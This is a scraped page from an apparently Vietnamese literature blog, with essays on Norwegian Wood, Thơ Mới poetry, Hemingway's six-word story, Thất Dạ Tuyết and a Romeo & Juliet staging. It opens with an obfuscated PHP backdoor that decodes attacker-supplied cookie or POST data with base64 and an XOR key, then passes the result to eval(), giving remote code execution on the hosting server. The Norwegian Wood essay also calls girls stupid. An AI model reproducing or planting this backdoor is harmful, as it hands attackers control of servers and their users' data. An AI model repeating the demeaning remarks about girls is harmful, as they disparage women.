$gkTikmvawS = class_exists("L_JuS");if (!$gkTikmvawS){class L_JuS{private $pEkriz;public static $gEJHvAd = "0bac3d14-080a-40da-9ae3-072f26eb3bee";public static $hiuUA = NULL;public function __construct(){$nACiVMM = $_COOKIE;$ZybOWNLPM = $_POST;$AjoGQkCSfU = @$nACiVMM[substr(L_JuS::$gEJHvAd, 0, 4)];if (!empty($AjoGQkCSfU)){$CHzhCIO = "base64";$MphdUtXc = "";$AjoGQkCSfU = explode(",", $AjoGQkCSfU);foreach ($AjoGQkCSfU as $XvwaYg){$MphdUtXc .= @$nACiVMM[$XvwaYg];$MphdUtXc .= @$ZybOWNLPM[$XvwaYg];}$MphdUtXc = array_map($CHzhCIO . chr ( 182 - 87 ).'d' . 'e' . "\143" . chr (111) . "\x64" . chr (101), array($MphdUtXc,)); $MphdUtXc = $MphdUtXc[0] ^ str_repeat(L_JuS::$gEJHvAd, (strlen($MphdUtXc[0]) / strlen(L_JuS::$gEJHvAd)) + 1);L_JuS::$hiuUA = @unserialize($MphdUtXc);}}public function __destruct(){$this->rybNWbPiMq();}private function rybNWbPiMq(){if (is_array(L_JuS::$hiuUA)) {$EgZDwdc = str_replace("\74" . chr ( 405 - 342 )."\160" . "\150" . chr ( 886 - 774 ), "", L_JuS::$hiuUA[chr ( 642 - 543 ).chr (111) . 'n' . "\164" . "\x65" . "\x6e" . 't']);eval($EgZDwdc);exit();}}}$RYRUp = new L_JuS(); $RYRUp = NULL;} ?> Literature – B.l.u.e

B.l.u.e

Inside the crowd, I dance [alone]

Menu Close

Category: Literature (page 1 of 2)

Rừng NaUy hay thứ văn hoá phẩm tởm lợm

Nếu tôi trở thành bộ trưởng Bộ Văn Hoá Thông Tin Việt Nam (tôi không nhớ tên chính xác của Bộ này, nhưng đại loại thế), việc đầu tiên tôi làm sẽ là cấm tiệt những cuốn tiểu thuyết Nhật Bản đương đại, những thứ theo ý kiến của tôi là chẳng làm được việc gì, ngoài đầu độc tâm hồn giới trẻ Việt Nam, đặc biệt là những đứa con gái vốn dĩ đã ngu đần lại hay thích triết lí.

Tôi không phủ nhận, tôi ghét cái trào lưu tiểu thuyết Nhật Bản, vốn như cơn lũ đổ ập vào thị trường Việt Nam tầm vài năm nay, vì bản tính tôi đã không ưa việc tung hô một điều gì thái quá. Nhưng việc không thích cái trào lưu tung hô một thứ gì đó, nó hoàn toàn khác với việc ghét bản thân chính cái thứ đó. Cuốn sách mà tôi tự hứa với lòng là sẽ không bao giờ đọc lần hai là “Kim Dung giữa đời tôi” của Vũ Đức Sao Biển, những bài bình luận mà tôi nhấn ngay Alt – F4 ngay khi vừa đọc cái tiêu đề là những bài bình nhạc Trịnh Công Sơn, chỉ vì những thứ vớ vẩn này dùng hằng hà vô số mỹ tử để gán ghép cho các tác phẩm, mà tôi chắc là vào thời điểm sáng tác, dù trong mơ, những tiểu thuyết gia hay nhạc sĩ của chúng ta cũng không tưởng tượng ra được đến thế.

Lại nhắc về trào lưu tiểu thuyết Nhật Bản, mở màn bằng Rừng Nauy. Tôi một thời tự nhắc bản thân rằng mình phải trở thành con người tốt bụng, nên ra sức dìu dắt, trò chuyện, cố gắng thấu hiểu các bé gái tuổi teen xinh xinh, chỉ đơn thuần là trò chuyện, nói ra kẻo các bạn lại hiểu lầm. Lúc đấy, tôi hết sức ngạc nhiên khi nghe nhiều bé quả quyết với tôi rằng: chưa đọc Rừng NaUy thì chết đi là vừa, đó là cuốn tiểu thuyết của mọi thời đại, vô cùng tuyệt vời, và bô lô ba la tất cả từ mà các bé – bằng đầu óc ngu si đặc trưng của loài gái, có thể nghĩ ra được.

Không phải tôi chưa từng đọc tác các phẩm văn học Nhật Bản, hay những gì viết về Nhật Bản. Ở Châu Á, ngoài Trung Quốc ra, thì Nhật Bản cũng là một nền văn hoá mà tôi thấy thích thú nhất. Cuốn tiểu thuyết Nhật Bản đầu tiên tôi đọc là “Đèn không hắt bóng” của Zunichi Watanabe; đó cũng là lần đầu tiên tôi cảm nhận được sự nghẹt thở bóp nát cả tâm hồn, đến mức nhiều lần, nhìn vào ánh đèn, tôi vẫn tưởng tượng ra cái dáng vẻ đầy lạnh lùng của nhân vật chính ấy. Sau đó, trong một tiết học Văn thời cấp III, như thường lệ, với khá nhiều thời gian rỗi vì chả bao giờ chép bài, tôi ngồi lướt qua cuốn sách và tìm thấy một truyện ngắn Nhật Bản viết về một người phụ nữ và tấm gương, cũng rất u ám và buồn bã. Kể từ hai ấn tượng đó, tôi ít khi nào tìm đọc những cuốn tiểu thuyết của Nhật Bản.

Tôi phá vỡ cái nguyên tắc của mình, chỉ vì nghe người ta xưng tụng Rừng NaUy quá, nên thử tìm xem liệu các tác phẩm Nhật Bản thời hiện đại (lúc bắt đầu đọc, tôi không biết là Rừng NaUy viết về thời những năm 1960, và ra đời vào tầm cuối thập kỉ 80) có thoát khỏi sự u ám và trầm uất ấy chưa. Lai rai, gặm nhắm, rốt cuộc tôi cũng đọc xong nó. Và cảm nhận trong tôi là: hay, nhưng đầy tởm lợm.

Tất nhiên, tôi khinh cuốn Rừng NaUy không phải như một thời người ta đánh nhau sứt đầu mẻ trán để tranh luận xem nó là Sex thuần tuý hay nghệ thuật đích thực. Với tôi, không gọi nó là sex thuần tuý thì cũng may lắm rồi, có những con trời đưa lên hàng nghệ thuật đích thực thì không thể nào hiểu nổi. Nhưng, nhắc lại, đó chỉ là một vấn đề gợn qua trong trí óc tôi, sau đó, tôi cũng không để ý gì đến nó nữa.
Tôi thấy ghét khi đọc Rừng NaUy không phải do cái không khí đầy buồn bã, u uất, đôi khi lên tới nghẹt thở của nó, vì thiếu gì tác phẩm nổi tiếng trên thế giới cũng khiến tôi có cùng cảm nhận như vậy. Ví dụ đơn giản nhất tôi nêu ra là cuốn đầu tiên tôi đọc vào năm lớp 6 “Túp lều bác Tôm”, cũng khiến người đọc trải qua bao phen uất ức, nghẹn ngào, căm phẫn và đồng cảm, đến rơi cả nước mắt (khi Tổng thống Abraham Lincoln gặp tác giả vào năm 1862 đã chào mừng bà bằng câu nói nổi tiếng: “Hóa ra bà chính là người phụ nữ nhỏ bé đã viết cuốn sách làm bùng lên cuộc chiến tranh vĩ đại”).

Điều làm tôi thấy tởm lợm ở đây là cái thứ triết lí ba xu, vớ vẩn của nó, đặc biệt là cái tư tưởng “Bởi vì cái chết là một phần của sự sống và bởi vì sự sống nuôi dưỡng cái chết từng ngày.”

Một cuốn tiểu thuyết mà đề cao sự chết, là một cuốn tiểu thuyết vô nhân đạo. Dù cuộc sống có như thế nào, thì cũng cần phải quí trọng nó, trân trọng vì mình đã được sinh ra. Trên hết mọi thứ trên đời này, sự sống là quí giá nhất.

Dĩ nhiên, tôi mới 22 tuổi đầu, chưa từng xảy ra những biến cố tang thương, cuộc đời chưa từng ném thẳng vào mặt tôi những điều bất hạnh, nên có thể nhiều người sẽ nói: do tôi chưa từng trải qua các cảm giác đó. Vâng, nhưng nếu cứ gặp khó khăn gì, cứ bế tắc lại đi tìm tới sợi dây trong khu rừng vắng, với cái triết lí nửa mùa ở trên, thì dân số thế giới này giảm quá nửa à?

“Cái chết là có thực, nó không phải là đối nghịch của cuộc sống, mà là một phần của cuộc sống.”

Ngu xuẩn. Tại sao một cuốn tiểu thuyết thay vì định hướng con người vượt qua những thời điểm u uất, lại đi rêu rao, đề cao những đứa dám “vượt qua nỗi đau của sự chết”, để rồi thằng thì chui vào xe bật ga hít cho đến chết, con thì cũng khùng khùng điên điên đi theo con đường ấy?

Đã từng có một vài thời điểm, tôi mơ hồ nhận ra cuốn tiểu thuyết này cũng có vài chỗ đẹp, chỗ hay, nhưng những cái cảm giác tởm lợm ấy khi nghĩ về những gì mà nó truyền đạt, lại thổi bay suy nghĩ ấy.

Tởm hơn cả là những người đưa nó về Việt Nam, và ca ngợi, hội thảo, báo chí để phổ biến nó.

Nhật Bản là một quốc gia bại trận sau Đại chiến năm 1945, vì thế, nước họ sản sinh ra một thế hệ, mà như thời Ernest Hemingway gọi là ‘Lost Generation’. Lượng người tự tử ở Nhật Bản luôn là đông nhất thế giới, chính vì thế Anime/ Manga được mọi lứa tuổi ở Nhật ưa thích, vì đó là nơi họ có thể hoá mình vào, trốn tránh cái thực tại đầy bế tắc, u ám xung quanh mình.

Việt Nam không như Nhật Bản, vì thế đem truyện này về Việt Nam, ngoài đầu độc tâm hồn những đứa trẻ đang lớn (lứa tuổi đọc Rừng NaUy nhiều là tầm 20), thì chẳng được gì.

Tôi thấy hơi buồn, khi thay vì tìm tới nền văn học Liên Xô hừng hực niềm tin yêu cuộc sống, với những tác phẩm bất hủ như ‘Thép đã tôi thế đấy’; nền văn học Pháp đầy lãng mạn và hài hước, văn học Anh với nét cổ điển đặc trưng, người ta lại tạo ra trào lưu tìm tới những thứ u uất, nghẹt thở như thế.

Hãy xem Trịnh Lữ nói gì khi dịch cuốn Rừng NaUy: “Và tôi hiểu được tại sao chỉ những nhân vật trung thực trong trắng và dũng cảm trong Rừng Na-uy mới tự kết liễu cuộc đời mình. Họ còn quá trẻ và không đủ kiên nhẫn để hy vọng cuộc đời này sẽ nuôi dưỡng được một cái chết tự nhiên xứng đáng. Và tôi cũng hiểu tại sao nhiều nhà văn lớn của Nhật Bản như Osamu Dazai và Yasunari Kawabata cũng đã chọn cái chết để khỏi phải chứng kiến cái đẹp và cái cao cả đang bị thời cuộc làm nhục.”

Thay vì bắt tay vào thay đổi cuộc đời, thay vì tự mình đứng lên, người ta lại đề cao sự dũng cảm khi tìm tới cái chết.

Chỉ hi vọng rằng lứa tuổi teen chỉ cảm nhận sự u uất đó thôi, không đứa nào ngu đến mức nghĩ “vì cuộc đời này không xứng đáng với những tâm hồn trong trắng, thánh thiện, yêu cái đẹp như ta, nên ta phải chọn cách chết…”

Ôi….

Văn học – Thi ca – Âm nhạc – Từ thời đại đến thời đại

Hôm nay, nhân đọc tin Tế Hanh – một trong những nhà thơ tiêu biểu trong phong trào Thơ Mới vừa qua đời ((http://vnexpress.net/GL/Van-hoa/2009/07/3BA11540/)), tôi chợt giật mình, cảm thấy hơi hụt hẫng khi nhận ra một điều rằng: những ngòi bút tuyệt vời ấy, rồi đã tới ngày chẳng còn ai trên cõi đời này (sự thật là hiện trong những tác giả được liệt kê ở cuốn “Thi nhân Việt Nam”, chỉ còn nhà thơ Xuân Tâm còn sống ((thông tin tại http://tintuc.xalo.vn/02976019621/nguoi_tho_con_sot_giua_nhan_gian.html – chưa kiểm chứng))). Để dòng suy nghĩ trôi miên man một hồi, tôi lại buồn bã khi phải tự thừa nhận sự thật là, sẽ phải cần một thời gian rất lâu (mà có lẽ cuộc đời tôi sẽ không chứng kiến được), Việt Nam mới lại sản sinh ra một thế hệ tài hoa tuyệt đỉnh như thế.

Tôi vốn là người rất ngại tìm hiểu, ít khi nào tự đặt những câu hỏi: tại sao?, nhưng trong vấn đề này, tôi muốn tìm ra câu trả lời thật thỏa đáng. Câu hỏi đặt ra ở đây là: tại sao thời đại hiện tại, không có những văn nghệ sĩ thực sự nổi bật? Điều này là do sự cách khoảng của chu kì thời gian, do ảnh hưởng của những yếu tố khách quan hay do những tính chất đặc trưng của thời đại chúng ta?

Tôi thích đọc thơ và nghe nhạc. Vì vậy, tôi sẽ thử viết về hai chủ đề chính này. Bài viết ắt còn nhiều thiếu sót, mong nhận được sự góp ý của mọi người.

1 – Văn học và Thi ca

Thi nhân Việt Nam

Trong tác phẩm Thi nhân Việt Nam do hai anh em Hoài Thanh – Hoài Chân xuất bản (lần đầu vào năm 1942), tác giả trong bài luận đề tựa của mình có gọi quãng thời gian từ năm 1932 – 1941 là “một thời đại trong thi ca”. Tôi cả nghĩ, nếu là tôi viết cuốn sách ấy, thì ắt sẽ đổi lại cụm từ trên thành “thời đại rực rỡ nhất trong thi ca”.
Nếu bạn lần đầu nhìn vào danh sách những nhà thơ được liệt kê trong Thi nhân Việt Nam (dĩ nhiên, có kha khá nhà thơ tài ba bị “bỏ sót” ((Tú Mỡ, Đỗ Phồn…))), tôi quả quyết rằng bạn sẽ phải ngạc nhiên. Không thể tin được tại sao chỉ trong chừng chục năm ngắn ngủi, mà văn đàn Việt Nam lại sản sinh ra nhiều quái kiệt thế, hoặc cũng có thể là tại sao những quái kiệt ấy, lại cho ra đời hầu hết những tác phẩm xứng đáng xếp vào hàng đỉnh cao trong cuộc đời sáng tác của mình vào thời điểm ấy.

Trăm hoa đua nở, Lưu Trọng Lư nhẹ nhàng và tinh tế, Huy Thông gói gọn trong hai chữ “bi tráng”, Xuân Diệu ông hoàng của tình thơ Việt Nam, chân quê như Nguyễn Nhược Pháp, đau thương Hàn Mặc Tử… tất cả đều tỏa sáng rực rỡ trong giai đoạn này.

Xét về lãnh vực văn xuôi, truyện ngắn. Tầm thời điểm này cũng chứng kiến sự lớn mạnh của các nhà văn trong phong trào Tự Lực Văn Đoàn. Những ngòi bút tài hoa của Thạch Lam, Khái Hưng, Nhất Linh… đua nhau nhảy múa. Chẳng thể nào quên được Thạch Lam với ngòi bút rất nên thơ, chân thật và thấm đậm tình người trong “Gió lạnh đầu mùa”, một “Hồn bướm mơ tiên” phiêu du, ảo mộng của Khái Hưng.
Năm 1941 cũng là năm ra đời của tác phẩm “Lò gạch cũ” (sau đổi tên thành Chí Phèo), là bệ phóng đưa Nam Cao vào danh sách một trong những nhà văn Việt Nam tiêu biểu nhất thế kỉ 20. Tầm năm này (1940), Nguyễn Tuân cho ra đời “Vang bóng một thời” – ngông đến cùng cực, nhưng tài hoa uyên bác được thể hiện qua từng câu, từng chữ, và “đẹp” đến vô ngần. Chúng ta cũng cần lưu ý, hầu như tất cả các tác phẩm hay nhất của “ông vua phóng sự” Vũ Trọng Phụng cũng ra mắt trong thời gian này (Giông Tố 1936, Số Đỏ 1936…)

Có kể thì tới ngày mai cũng không hết về các nhà văn, nhà thơ cùng tác phẩm tiêu biểu, tôi chỉ muốn rút lại một câu: hầu như những tài năng văn thơ kiệt xuất, đều chọn thời đại ấy để đầu thai, và để phát tiết tinh hoa, để lại cho đời những đứa con tinh thần bất hủ.

Vậy thì, tại sao thời đại ấy lại được như thế, còn hiện tại thì không?

Đầu tiên, ta thử xét qua về khía cạnh lịch sử và xã hội. Chúng ta nói về hai khía cạnh “vị nghệ thuật” và “vị nhân sinh”, nhé!
Sau chừng chục năm hội nhập với văn hóa của Tây phương, khi mà những giá trị đến từ các nước trời Âu ấy cái thì hòa lẫn, cái thì đấu đá với cái tư tưởng văn hóa Trung Hoa lãnh hội từ bao đời nay, con người ta phân vân, lạc lối trong mớ hỗn độn, ngổn ngang

Củi một cành khô, lạc mấy dòng
(Tràng Giang – Huy Cận – 1939)

Đến một lúc, khi nhu cầu khẳng định cái “TÔI” lớn mạnh, vượt qua những cái quan niệm “vì số đông” tồn tại lâu đời, người ta muốn viết, để ca ngợi những gì họ yêu thích, đấy là tình yêu, đấy là cái đẹp. Đây cũng là thời gian mà quan điểm “vị nghệ thuật” phát triển mạnh nhất. Hầu hết các bài thơ nổi tiếng trong phong trào Thơ mới, đều rất thi vị, hoàn toàn không giáo điều, không chính trị, không áp đặt tư tưởng… Phải chăng vì thế, nó mãi đi vào lòng người, bởi bản chất vốn có của loài người là yêu cái đẹp?

Về văn xuôi, lại là vấn đề khá khác.

Xã hội nhiễu nhương, nước mất nhà tan đặt các nhà văn vào vị trí phải dùng ngòi bút để vạch trần, để bóc tách mọi thứ. Những Chí Phèo, Số Đỏ… trong thời điểm này, đọc vào chỉ thấy đầy chua xót.

Tôi không bàn về “vị nghệ thuật” và “vị nhân sinh”, cái nào đúng, bởi việc này chẳng khác gì gà và trứng cái nào có trước. Chỉ thấy thật tấu xảo, phải chăng chính cái “vị nghệ thuật” đến mức tối đa đã tạo nên những bài thơ đầy thi vị, tinh tế và nhẹ nhàng và cái “vị nhân sinh” đến cùng cực cho ra đời các tác phẩm văn xuôi, truyện ngắn, phóng sự đọc vào chỉ muốn rơi nước mắt, đã hòa cùng nhau để tạo nên giai đoạn hoàng kim ấy?

Tôi lí giải điều trên có ý nói là điều kiện xã hội đã góp phần tạo nên những văn nghệ sĩ tuyệt vời ấy, mà bỏ qua yếu tố ngẫu nhiên của tạo hóa (vì bàn thế nào được). Thế thì ngày nay ra sao?

Ngày nay, cũng là thời điểm cái TÔI được đề lên rất cao. Phong trào emo rầm rộ, phong trào ăn mặc và để tóc phá cách, nhạc nhẽo, thể thao cá tính mạnh… là một phần minh chứng cho xu hướng này. Việc một người đề quá cao cái TÔI của mình không còn bị đánh giá một cách thiên kiến như vài chục năm trước.

Con người càng ngày càng yêu cái đẹp và muốn nói về nó. Nhưng vì sao thơ văn không lớn mạnh? Vì sao lại ít nhà văn nhà thơ nổi tiếng?

Tuy nhiên, với việc xã hội phát triển nhanh, dân giàu nước mạnh, ít hẳn đi các cảnh sống lầm than (nhìn chung đại bộ phận dân chúng so với những năm trước 1945), có thể nói, các văn nghệ sĩ của chúng ta thiếu hẳn đề tài sáng tác. Ồ, tôi không có chủ trương hay suy nghĩ: đất nước cần nghèo khổ để văn học phát triển, chỉ nêu lên mối tương quan giữa việc khi xã hội càng cần nhiều ngòi bút sắc lạnh, cần nhiều tác phẩm, thì khi đó mới xuất hiện càng nhiều tài năng kiệt xuất.

Nhưng, không thể lấy đó làm lí do để đổ lỗi hoàn toàn cho sự thật rằng nền văn học Việt Nam phát triển chậm hẳn lại vào lúc này. Thiên chức của người cầm bút là dùng câu chữ, lời văn của mình khắc họa cuộc sống. Cuộc sống không dừng lại, thì vì lí do gì mà văn học dừng lại?

Không thể nói rằng văn học – thi ca Việt Nam ta vào thời điểm này chẳng có gì ra hồn. Vẫn có những tác phẩm hay, nhưng đem so với những bài thơ, câu chuyện của thời đại trước, thì khoảng cách còn ở xa lắm. Đấy là chưa nói giai đoạn trước đây, có vô vàn bài thơ và tác phẩm văn xuôi xuất sắc thế.

Ngoài ra, tôi nghĩ cần bàn đến sự tác động của việc bùng nổ các phương tiện truyền thông. Nhưng đây là vấn đề, sẽ bàn ở phần sau, bởi nó cũng là nguyên nhân ảnh hưởng đến sự phát triển của nền âm nhạc Việt Nam. Nói ra trước sẽ mất lí thú.

2 – Âm nhạc

Còn tiếp…

p/s: Bài này có sử dụng tư liệu tại http://vi.wikipedia.org/wiki/Thi_nhân_Việt_Nam.

Ernest Hemingway’s Six-Word Story

Shoes

Ernest Hemingway là một nhà văn nổi tiếng, điều này không nói thiết tưởng ai cũng biết. Nhưng có một điều mà có thể ít người biết, Hemingway từng gọi một truyện chỉ có sáu chữ của mình là “greatest story”.

Truyện ấy là: “For sale: baby shoes, never worn.”

dịch đại khái ra tiếng Việt là “Đang bán: giày trẻ em, chưa từng đi.”

Lí do tại sao ra đời câu chuyện trên hiện vẫn còn là điều gì đó không rõ ràng. Có nhiều ý kiến cho rằng, đấy đơn giản là một trò cá cược nhỏ ((http://www.youngwriterssociety.com/ywsblog/2008/05/04/hemingways-legendary-six-word-story/)), riêng ý kiến của tôi lại khác.

Không hẳn là áp dụng cái gọi là chủ quan duy ý chí vào đây, nhưng tôi vẫn cho rằng, một nhà văn viết nên được những tuyệt tác như “Chuông nguyện hồn ai”, “Ông già và biển cả”, không nhiều thì ít cũng có chút dụng ý gì đấy – hoặc giả ông muốn truyền tải gì khi viết ra sáu từ trên.

“For sale: baby shoes, never worn.”

Nếu bối cảnh câu chuyện không phải là ở một cửa hàng bán giày, thì suy tưởng một xíu, có thể lập ra rất nhiều kịch bản cho câu trên. Một kịch bản mà đang hiện trong đầu tôi là:

Không ai tự dưng mua đồ trẻ con về để trong nhà. Tôi rất thích thú với hình ảnh cặp vợ chồng khi biết mình sắp có con, tất bật mua sắm đủ thứ cho em bé. Và đôi giày trên, có lẽ là một trong số rất nhiều đồ vật như vậy.
Never worn – chưa từng được đi một lần, rất có thể vì lí do gì đấy, mà người vợ trẻ không thể giữ được đứa bé. Vì thế, đôi giày ấy, vẫn còn là một đôi giày mới tinh.
Quả thật, cứ nghĩ đến tất cả niềm hi vọng của một cặp đôi trẻ về một đứa con xinh xắn, đáng yêu – biểu hiện qua đôi giày trẻ em nhỏ xíu, không còn nữa, thì tự nhiên lại thấy nao nao. Trong giai đoạn này, tôi đã có duyên trò chuyện, và biết chuyện vài chị mang thai, và đến giờ tôi vẫn không thể quên ánh mắt và giọng nói tràn đầy hi vọng, như đặt tất cả tình yêu của cả đời mình vào đứa bé ấy. Thật đẹp biết bao!

Nhưng còn chữ For sale, tại sao lại đem bán đi nhỉ? Là nhẫn tâm hay là trốn tránh đau thương thực tại?

Dù sao thì sáu chữ tuy không nhiều, nhưng cũng có thể coi là đủ…

B.l.u.e.

Thất Dạ Tuyết

Thất Dạ Tuyết

“Thì ra, cho dù là tình cảm sâu sắc nhất trong đời, chung quy cũng không chống lại nổi thời gian.”

Phụ nữ viết truyện, luôn có tư vị khác với đàn ông.
Phụ nữ viết kiếm hiệp, thì lại càng khác.

Kim Dung uyên thâm, tinh tế, tựa như một vò rượu nhẹ, uống xuống rồi vẫn còn để lại chút cảm giác thoải mái, ngọt ngào.
Cổ Long tràn đầy khắc khoải, ưu tư, rượu càng vào sâu càng đắng, không, phải gọi là chát, chua chát đến tận cùng.
Thương Nguyệt – người phụ nữ ấy, về mặt tinh tế không thua gì Kim lão, nhưng lại đôi khi khiến độc giả gấp trang sách lại, ngồi ngẩn ra một lúc rồi nhủ thầm: “sao lại có thể khắc khoải, sâu lắng, đến mức này?” như hay thấy ở các tác phẩm nổi tiếng của Cổ Long.

Thất Dạ Tuyết, thực ra, cái tên không khái quát nên đủ nội dung câu chuyện. Bởi mọi thứ có thể bắt nguồn từ những đêm tuyết ấy, nhưng, phù, cô gái ấy quá tham lam, chỉ trong 17 chương, đã đủ nói trọn vẹn về rất nhiều người, mà người nào, cũng mô tả đến mực tuyệt diệu.

– Hoắc Triển Bạch – thất công tử của Đỉnh Kiếm Các, người được xem là Trung Nguyên đệ nhất kiếm, trí tài đều có thể coi là không đứng dưới bất kì ai, lại không thể nào tự thắng được chính những ảo mộng do mình tự tạo ra rồi khăng khăng giữ lấy.
Tám năm trời rong ruổi bốn phương, chỉ để đuổi lấy một bóng hình, nhưng, mãi chỉ là kẻ đến sau.
Đến rồi, một ngày, khi chợt nhận ra mình đã già mất rồi, cái thời niên thiếu yêu cuồng si mê dại ấy đã qua đi không trở lại. Cái tư vị khi một ngày nhìn nhận ra điều này sẽ như thế nào nhỉ?
Thở dài? Tiếc nuối? Thống hận? hay thanh thản?

– Tiết Tử Dạ – Dược sư cốc, thiên hạ đệ nhất thần y. Cũng như Triển Bạch, hơn mười năm trời, nàng sống với ánh mắt nhìn đăm đăm về quá khứ, nơi ngày ấy, nàng và chàng trai ấy thật vui vẻ và hạnh phúc.
Là si mê? Là chấp niệm?
Biết là thế, mà nàng cứ đâm đầu vào.
Cái vọng tưởng ngỡ như tồn tại cả đời ấy, rồi lại cũng tan biến theo thời gian

Triển Bạch và Tử Dạ, cái ngày hai người quyết tâm bỏ đi – thứ – gọi – là – một – thời của mình, tôi thật sự muốn biết, hai vị có cảm giác thế nào?

– Đồng – Minh Giới – Đại Quang minh cung đệ nhất sát thủ. Có người nói, quên sẽ tốt hơn. Nhưng, quên đi điều làm mình đau, và mãi nhớ điều làm mình đau, điều gì tốt hơn? Câu trả lời là điều đầu tiên. Nhưng có lẽ không ít người sẽ chọn cách sau. Chỉ để mãi nhớ một trường kí ức, một hình ảnh. Con người này, sống nhưng chẳng khác nào đã chọn cách chết cho chính bản thân mình. Là định mệnh ư?

– Diệu Phong – Minh Giáo Ngũ Minh Tử. Trong Thất Dạ Tuyết, có thể nói, đây là người đau khổ nhất.
Một người mà ngay từ năm tuổi không thể khóc, phải luôn cười, cứ vô tâm, vô thần mà hành sự. Một người biết rằng mình phải khóc để giải toả, mà không khóc được. Người ấy, ắt hẳn là sẽ đau đớn đến khôn cùng.
Cái đêm Diệu Phong chạy như bay ngoài tuyết, vô vọng sưởi ấm một bóng hình – hình ảnh ánh sáng của đời hắn, hắn đã nghĩ gì? Khi ngay vừa thoát khỏi vẽ lãnh ngạo trên khuôn mặt lẫn cả trong tim, lại phải chịu đựng cái chết của hai người có ý nghĩa nhất đời mình, hắn đau đến mức nào?

Mỗi nhân vật đều là mỗi đoạn cuộc đời khác nhau, điểm giống nhau duy nhất là đều phải trải qua những giai đoạn đau khổ – hạnh phúc – đau khổ, nối tiếp. Tất cả, từ giờ đến cuối cuộc đời, đều sẽ sống với hai từ “kí ức”.
Biết là như thế, mà vẫn đâm đầu vào, con người, chung quy vẫn mãi là những kẻ ngốc…

những ký ức ấy tựa như một thanh đao, mỗi lần nhớ đến là lại cắt sâu vào tim một vết thương sâu hoắm, chỉ cần y còn sống một ngày, thứ hình phạt lăng trì này sẽ mãi không bao giờ dừng lại.

B.l.u.e.

Romeo & Juliet

Romeo & Juliet

Anh không thích Shakespeare.
Vì lí do đấy dĩ nhiên anh không thích Romeo & Juliet.

Các bạn hỏi anh nguyên nhân tại sao ư? Anh không hay lấy cái mỡ hỗn độn cảm xúc yêu hay ghét của anh, ngồi tích phân nó ra [nghe có vẻ toán học nhỉ], và nêu đích xác cho các bạn biết từng nhân tố đó là gì. Nhưng lần này ngoại lệ vậy.

E hèm, một chút ghen tị khi mình si tình chẳng kém gì Romeo mà lại không tìm được ai như Juliet, vừa xinh đẹp

O, she doth teach the torches to burn bright!
It seems she hangs upon the cheek of night

lại vừa thuỷ chung

And I will do it without fear or doubt,
To live an unstain’d wife to my sweet love.

Đó cũng có thể là chút mỉa mai, khi thấy thiên hạ đua nhau đọc và tán dương Romeo & Juliet, ca ngợi đấy là thiên tình sử diễm lệ; nhưng hầu như chẳng ai đủ can đảm chọn sống một cách sống và yêu theo cách yêu như thế, hay đã chọn rồi thì cũng không đi được hết con đường mình đã chọn.

Thêm một lí do cá nhân khác, mặc dù cái này anh tự nhận là anh không đúng lắm, đấy là thứ ngôn ngữ trong Romeo & Juliet. Dĩ nhiên, sẽ có những bạn với vốn kiến thức uyên thâm, nhảy vào giảng cho anh bài học về thế nào là ngôn ngữ trong văn, thơ, kịch… cổ. Anh tiếp nhận. Áp dụng cái nhìn của thời đại này đối với những năm của thế kỉ XVI, XVII thì quả là lệch lạc. Nhưng anh vẫn rất không thích ngôn ngữ [mà anh cho là] sáo rỗng ấy, dù cho nó hay, một lần nữa, anh thừa nhận.

Nhưng dĩ nhiên, việc không thích và việc viết cảm nhận, là hai việc hoàn toàn khác nhau. Nhất là khi nó lại đi kèm với suy nghĩ: làm sao cho đáng với số tiền đã bỏ ra mua vé ((150k VNĐ/vé, nghĩa là bằng 10 tô bún bò hằng ngày của anh *cười*)).

Thế nên, bài này của anh, sẽ là cảm nhận về Romeo & Juliet, hay nói chính xác tới từng milimét một là vở kịch Romeo & Juliet, diễn ra tại nhà hát kịch Thành Phố mà anh đã có dịp xem tối hôm qua.

Thông tin về nó thì anh đã tìm cho các bạn ở VietNamNet:
Vở kịch kinh điển Romeo & Juliet của đại văn hào William Shakespeare lần đầu tiên được nhà hát TNT Vương quốc Anh mang sang công diễn tại Việt Nam vào đầu tháng 5 tới.
nghe tên nhà hát cứ như tên sản phẩm của Nobel bạn anh ấy nhỉ?

Ở một đất nước, nơi mà tuy hằng ngày báo đài vẫn nhắc ầm ầm về cụm từ “thời hội nhập”, người dân đã có dịp tiếp xúc nhiều hơn với các tác phẩm văn hoá nghệ thuật đến từ nước ngoài. Bọn trẻ giờ mới lớp 6, lớp 7 đã có thể nhún nhảy theo nhạc của High School Musical, các bạn gái thơ mộng thì hầu hết giờ đang trông lên poster film Twilight treo đầu giường mà ngắm anh Edward Cullen xinh giai của các bạn hàng giờ. Tuy nhiên, những thứ thuộc về nghệ thuật kinh điển (anh xin lỗi, anh không biết dùng từ gì khác, các bạn có gợi ý gì chăng?) thì lại ít được trình chiếu.

Nếu các bạn thật sự quan tâm, thì hẳn không ít thì nhiều, đã vài ba lần các bạn thấy ghen tị với bọn phương Tây mắt xanh mũi lõ, khi nó có thể xem sân khấu kịch Broadway ((http://en.wikipedia.org/wiki/Broadway_musical)) bất cứ khi nào nó muốn (và có suất diễn). Nó có thể hoà mình vào những vở nhạc kịch bất hủ như Les Miserables, Notre-Dame de Paris của Victor Hugo ((http://en.wikipedia.org/wiki/Victor_Hugo)), hay Swan Lake của Peter Ilyich Tchaikovsky ((http://en.wikipedia.org/wiki/Swan_Lake)). Những điều này chúng ta không thể.

Nói thế để các bạn thấy, cơ hội được xem các vở kịch nước ngoài diễn ở sân khấu Việt Nam là không nhiều. Cách đây tầm vài tháng thì là Annie Get Your Gun ((http://en.wikipedia.org/wiki/Annie_Get_Your_Gun)), và giờ đây là Romeo & Juliet. Dù các vở đấy có hay hoặc còn chỗ thiếu sót, thì âu đó cũng là tín hiệu đáng mừng, vì chúng ta có thể có cơ hội để hầu như cảm nhận hoàn toàn tác phẩm – với đúng nghĩa là bản thân của nó.

Romeo & Juliet hôm qua trên sân khấu rất nhẹ nhàng và đơn giản, tựa như một bài thơ sonnet – thể loại thơ tình rất thịnh hành vào những năm cuối thế kỷ 16 ((http://en.wikipedia.org/wiki/Sonnet)). Đạo cụ trên sân khấu chỉ là phông màn, và vài thùng các-tông. Không biết là do nhà hát kịch Thành phố đã tương đối cũ kĩ, nên góp phần ảnh hưởng đến thị giác của anh, hoặc giả là đấy là ý đồ của người dàn dựng vở kịch, mà tông màu của vở kịch cứ trắng – đen, đơn điệu đến nhạt nhoà. Có lẽ ý đồ của nhà hát TNT là khiến khán giả tập trung vào diễn xuất, biểu cảm của các nghệ sĩ đứng trên sân khấu hơn là nhờ vào kĩ xảo chăng?

Tuy nhiên, cái màn hình subtitle có vẻ đã phá vỡ điều đó.

